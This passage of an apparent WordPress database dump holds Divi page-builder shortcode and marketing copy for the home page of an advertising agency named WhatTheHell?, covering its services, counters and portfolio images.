button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Message\" field_title=\"Message\" field_type=\"text\" fullwidth_field=\"on\" _builder_version=\"4.4.9\" custom_margin=\"||60px|\" custom_padding=\"|||\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][/et_pb_contact_form][/et_pb_column][/et_pb_row][/et_pb_section]','Home','','inherit','closed','closed','','134-revision-v1','','','2020-08-07 11:55:59','2020-08-07 11:55:59','',134,'https://wthtest1.in8.cdn-alpha.com/2020/08/07/134-revision-v1/',0,'revision','',0),(461,1,'2020-08-07 11:56:23','2020-08-07 11:56:23','[et_pb_section fb_built=\"1\" admin_label=\"Hero\" _builder_version=\"3.22\" custom_padding=\"0px|0px|0px|0px\" animation_style=\"zoom\" animation_intensity_zoom=\"4%\"][et_pb_row use_custom_gutter=\"on\" gutter_width=\"1\" make_equal=\"on\" module_class=\" et_pb_row_fullwidth\" _builder_version=\"4.5.2\" background_color=\"#fcd21d\" background_image=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/Desktop-HD-1024x728-1.png\" width=\"100%\" width_tablet=\"100%\" width_phone=\"\" width_last_edited=\"on|desktop\" max_width=\"100%\" max_width_tablet=\"100%\" max_width_phone=\"\" max_width_last_edited=\"on|desktop\" custom_margin=\"|auto|1px|auto||\" custom_padding=\"50px||50px|||\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"3%\" make_fullwidth=\"on\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"10%|8%|10%|8%\" custom_padding__hover=\"|||\"][et_pb_text content_tablet=\"\" content_phone=\"<h1 style=%22text-align: center;%22><span style=%22color: #ffffff;%22>Welcome to</span><br /> <span style=%22color: #ffffff;%22> Advertising</span></h1>\n\" content_last_edited=\"on|phone\" _builder_version=\"4.4.9\" text_font=\"||||||||\" text_font_size=\"18px\" header_font=\"Montserrat|700||on|||||\" header_text_color=\"#f7f7f7\" header_font_size=\"76px\" header_line_height=\"1.3em\" custom_margin=\"6px||40px|||\" animation_style=\"zoom\" animation_duration=\"1200ms\" text_font_tablet=\"\" text_font_phone=\"\" text_font_last_edited=\"on|phone\" text_font_size_tablet=\"\" text_font_size_phone=\"12px\" text_font_size_last_edited=\"on|phone\" header_font_size_tablet=\"64px\" header_font_size_phone=\"40px\" header_font_size_last_edited=\"on|phone\" text_text_shadow_style=\"preset1\" locked=\"off\"]<h1 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Welcome to</span><br /> <span style=\"color: #ffffff;\"> Advertising</span></h1>[/et_pb_text][et_pb_button button_text=\"Learn More\" button_alignment=\"center\" _builder_version=\"4.4.9\" custom_button=\"on\" button_text_color=\"#ffffff\" button_border_width=\"4px\" button_border_color=\"#ffffff\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" animation_style=\"zoom\" animation_duration=\"1200ms\" box_shadow_style=\"preset2\" button_text_color_hover=\"#ffffff\" button_border_color_hover=\"#ffffff\" button_letter_spacing_hover=\"2px\" button_bg_color_hover=\"rgba(0,0,0,0)\" locked=\"off\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#ffffff\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"on\" button_border_color__hover=\"#ffffff\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"2px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" custom_padding_last_edited=\"on|tablet\" admin_label=\"Service Section\" _builder_version=\"4.4.9\" custom_margin=\"|||\" custom_padding=\"56px||110px|||\" custom_padding_tablet=\"20px||||false|false\" custom_padding_phone=\"12px||40px||false|false\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>What we do</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p><span>WhatTheHell? is not some advertising, digital and design agency. An irreverent ideas farm seems more like it.</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" use_custom_gutter=\"on\" gutter_width=\"2\" make_equal=\"on\" admin_label=\"Services\" _builder_version=\"3.25\" max_width=\"80%\" custom_padding=\"25px||25px|\" use_custom_width=\"on\" width_unit=\"off\"][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Creative\" use_icon=\"on\" font_icon=\"%%74%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>It is important for the creative process and our lives. A key component of visual marketing to let businesses succeed.</span></p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Media\" use_icon=\"on\" font_icon=\"%%103%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"100ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Strategically using new age media and creating a media mix effectively to evolve a sales funnel or brand awareness to engagement.</span></p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Digital\" use_icon=\"on\" font_icon=\"%%107%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"200ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Digital has emerged as one of the efficient media, there is no spill over with the help of professional targeting &amp; even individual targeting is possible.</span></p>[/et_pb_blurb][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" use_custom_gutter=\"on\" gutter_width=\"2\" make_equal=\"on\" admin_label=\"Services\" _builder_version=\"3.25\" max_width=\"80%\" custom_padding=\"25px||25px|\" use_custom_width=\"on\" width_unit=\"off\"][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Business Strategy\" use_icon=\"on\" font_icon=\"%%101%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Gaining the competitive edge with Integrated Marketing Communications (IMC) or building product marketing strategy / Go to market strategy, We are in.</span></p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Web Design\" use_icon=\"on\" font_icon=\"%%106%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"100ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p>Online presence of any brand/product/service starts with a well defined and clearly communicated website. Website is the key and elementry step for any advertising campaign. So be ready to a bolder start.</p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Design/Video/Photo\" use_icon=\"on\" font_icon=\"%%108%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"200ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Design is not Art, Art is about the Artist, &amp; Design is about the user. Blending &amp; Balancing Art, Design, Copy &amp; Business Objective is what we do.</span></p>[/et_pb_blurb][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Video Section\" _builder_version=\"4.4.9\" use_background_color_gradient=\"on\" background_color_gradient_start=\"#ffffff\" background_color_gradient_end=\"#d4b068\" background_color_gradient_start_position=\"65%\" background_color_gradient_end_position=\"65%\" custom_padding=\"|||\"][et_pb_row admin_label=\"Video\" _builder_version=\"3.25\" custom_padding=\"0px|0px|0px|0px\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"4%\" animation_starting_opacity=\"100%\" box_shadow_style=\"preset1\" box_shadow_blur=\"77px\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_video src=\"https://www.youtube.com/watch?v=f47r43eO6BU&t=5s\" image_src=\"//i.ytimg.com/vi/f47r43eO6BU/hqdefault.jpg\" thumbnail_overlay_color=\"rgba(0,0,0,0.6)\" _builder_version=\"4.5.2\" animation_direction=\"bottom\" box_shadow_style=\"preset5\" box_shadow_vertical=\"0px\" box_shadow_spread=\"20px\" box_shadow_color=\"#ffffff\"][/et_pb_video][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Fun Fact Section\" _builder_version=\"4.4.9\" background_color=\"#d4b068\" custom_margin=\"|||\" custom_padding=\"60px||50px||false|false\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2><span style=\"color: #ffffff;\">Generating New Ideas. Solving real Problems</span></h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#353740\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p>Ideas are relevant if it has power to solve the real problem at hand. We are always keen on working practical ideas in the realtime business atmosphere.</p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_4,1_4,1_4,1_4\" admin_label=\"Fun Fact\" _builder_version=\"3.25\" custom_margin=\"|||\" custom_padding=\"40px||40px|\" animation_style=\"zoom\" animation_direction=\"top\" animation_intensity_zoom=\"10%\"][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Projects\" number=\"350\" percent_sign=\"off\" _builder_version=\"4.4.9\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\"][/et_pb_number_counter][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Satisfied Clients\" number=\"62\" percent_sign=\"off\" _builder_version=\"4.4.9\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\" animation_delay=\"100ms\"][/et_pb_number_counter][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Ongoing Projects\" number=\"16\" percent_sign=\"off\" _builder_version=\"4.4.9\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\" animation_delay=\"200ms\"][/et_pb_number_counter][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Cups Of Coffee\" number=\"906\" percent_sign=\"off\" _builder_version=\"4.4.9\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\" animation_delay=\"300ms\"][/et_pb_number_counter][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Feature Section\" _builder_version=\"4.4.9\" custom_margin=\"|||\" custom_padding=\"50px||3px||false|false\"][et_pb_row column_structure=\"1_2,1_2\" use_custom_gutter=\"on\" gutter_width=\"4\" custom_padding_last_edited=\"on|phone\" admin_label=\"Feature\" module_class=\" et_pb_row_fullwidth\" _builder_version=\"4.5.1\" width=\"86%\" width_tablet=\"80%\" width_phone=\"\" width_last_edited=\"on|desktop\" max_width=\"86%\" max_width_tablet=\"80%\" max_width_phone=\"\" max_width_last_edited=\"on|desktop\" custom_padding=\"40px||23px||false|false\" custom_padding_tablet=\"\" custom_padding_phone=\"0px||||false|false\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/Why-we.png\" alt=\"Why We creative agency\" title_text=\"Why we\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.2\" custom_margin=\"61px|||||\" custom_margin_tablet=\"\" custom_margin_phone=\"0px||||false|false\" custom_margin_last_edited=\"on|phone\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"8%\" animation_starting_opacity=\"100%\" hover_enabled=\"0\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"7%||7%|\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_text_align=\"left\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" max_width=\"700px\" module_alignment=\"left\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\" locked=\"off\"]<h2><span>Why choose us?</span></h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" max_width=\"700px\" module_alignment=\"left\" custom_margin=\"|||\" custom_padding=\"||20px|\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\" locked=\"off\"]<p><span>WhatTheHell? is not some advertising, digital and design agency. An irreverent ideas farm seems more like it. Always eager to work with people who are looking to do brilliant things to their brands.</span></p>\n<p> <span>We help in realizing brand aspirations through our in-depth research &amp; analytics and translate them into irreverent creative ideas. We always remember that there’s more to marketing communication than top-funnel awareness building through BTL, ATL, Outdoor, or Digital Media Publishing.</span></p>[/et_pb_text][et_pb_button button_url=\"#\" button_text=\"Learn More\" _builder_version=\"3.16\" custom_button=\"on\" button_text_color=\"#747d88\" button_border_width=\"4px\" button_border_color=\"#747d88\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#747d88\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"20%\" button_text_color_hover=\"#747d88\" button_border_color_hover=\"#747d88\" button_letter_spacing_hover=\"2px\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#747d88\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"on\" button_border_color__hover=\"#747d88\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"2px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Latest Work Section\" _builder_version=\"4.4.9\" background_color=\"#f7f7f7\" custom_padding=\"50px||50px||false|false\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"|auto|2px|auto||\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Our Latest Work</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p><span>Creative &amp; Effective work around practical marketing problems. Next update will have your creatives.</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" make_equal=\"on\" use_custom_gutter=\"on\" gutter_width=\"1\" specialty=\"on\" padding_top_1=\"0px\" admin_label=\"Work Section\" module_class=\" et_pb_specialty_fullwidth\" _builder_version=\"3.22\" background_color=\"#f7f7f7\" inner_width=\"100%\" inner_width_tablet=\"100%\" inner_width_phone=\"\" inner_width_last_edited=\"on|desktop\" inner_max_width=\"100%\" inner_max_width_tablet=\"100%\" inner_max_width_phone=\"\" inner_max_width_last_edited=\"on|desktop\" custom_padding=\"0px|5%|0px|5%\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_top__hover=\"0px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/home-office-02.jpg\" url=\"#\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.2\" animation_style=\"flip\" animation_intensity_flip=\"30%\" hover_enabled=\"0\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\" title_text=\"home-office-02\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_2\" specialty_columns=\"2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_row_inner _builder_version=\"3.25\" custom_padding=\"0px||0px|\"][et_pb_column_inner saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/home-office-03.jpg\" url=\"#\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column_inner][/et_pb_row_inner][et_pb_row_inner column_structure=\"1_2,1_2\" _builder_version=\"3.25\" custom_padding=\"0px||0px|\"][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/home-office-05.jpg\" url=\"#\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.2\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"30%\" hover_enabled=\"0\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\" title_text=\"home-office-05\"][/et_pb_image][/et_pb_column_inner][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/home-office-04.jpg\" url=\"#\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.2\" animation_style=\"flip\" animation_intensity_flip=\"30%\" hover_enabled=\"0\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\" title_text=\"home-office-04\"][/et_pb_image][/et_pb_column_inner][/et_pb_row_inner][/et_pb_column][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Button Section\" _builder_version=\"4.4.9\" background_color=\"#f7f7f7\" custom_padding=\"0px||50px||false|false\"][et_pb_row _builder_version=\"3.25\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_button button_url=\"#\" button_text=\"See More\" button_alignment=\"center\" _builder_version=\"3.16\" custom_button=\"on\" button_text_color=\"#747d88\" button_border_width=\"4px\" button_border_color=\"#747d88\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#747d88\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"20%\" button_text_color_hover=\"#747d88\" button_border_color_hover=\"#747d88\" button_letter_spacing_hover=\"2px\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#747d88\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"on\" button_border_color__hover=\"#747d88\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"2px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" 